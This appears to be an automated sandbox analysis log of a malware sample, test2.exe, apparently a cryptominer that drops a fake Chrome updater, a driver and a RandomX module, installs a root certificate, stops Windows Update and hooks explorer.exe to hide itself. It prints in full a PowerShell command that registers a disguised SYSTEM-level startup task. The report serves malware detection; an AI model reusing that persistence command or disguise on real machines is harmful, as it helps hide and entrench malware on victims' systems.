      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeDirectory created: C:\Program Files\Google\Libs
      Source: test2.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: test2.exeStatic file information: File size 5986304 > 1048576
      Source: test2.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00
      Source: test2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: kkldhmzqxige.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x554c2a
      Source: updater.exe.0.drStatic PE information: real checksum: 0x5b5d5c should be: 0x5bb0b6
      Source: test2.exeStatic PE information: real checksum: 0x5b5d5c should be: 0x5bb0b6
      Source: kkldhmzqxige.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x342e8
      Source: test2.exeStatic PE information: section name: .xdata
      Source: updater.exe.0.drStatic PE information: section name: .xdata
      Source: kkldhmzqxige.tmp.30.drStatic PE information: section name: _RANDOMX
      Source: kkldhmzqxige.tmp.30.drStatic PE information: section name: _TEXT_CN
      Source: kkldhmzqxige.tmp.30.drStatic PE information: section name: _TEXT_CN
      Source: kkldhmzqxige.tmp.30.drStatic PE information: section name: _RDATA

      Persistence and Installation Behavior

      barindex
      Installs new ROOT certificates
      Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
      Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
      Sample is not signed and drops a device driver
      Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
      Source: C:\Users\user\Desktop\test2.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
      Source: C:\Users\user\Desktop\test2.exeFile created: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmpJump to dropped file
      Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\kkldhmzqxige.tmpJump to dropped file
      Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
      Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\kkldhmzqxige.tmpJump to dropped file
      Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NcbService\NCBKapiNlmCache\6
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

      Hooking and other Techniques for Hiding and Protection

      barindex
      Found hidden mapped module (file has been removed from disk)
      Source: C:\Users\user\Desktop\test2.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KKLDHMZQXIGE.TMP
      Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\KKLDHMZQXIGE.TMP
      Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\KKLDHMZQXIGE.TMP
      Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\KKLDHMZQXIGE.TMP
      Hooks files or directories query functions (used to hide files and directories)
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
      Hooks processes query functions (used to hide processes)
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
      Hooks registry keys query functions (used to hide registry keys)
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9A 0xA3 0x32 0x2E 0xEF
      Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
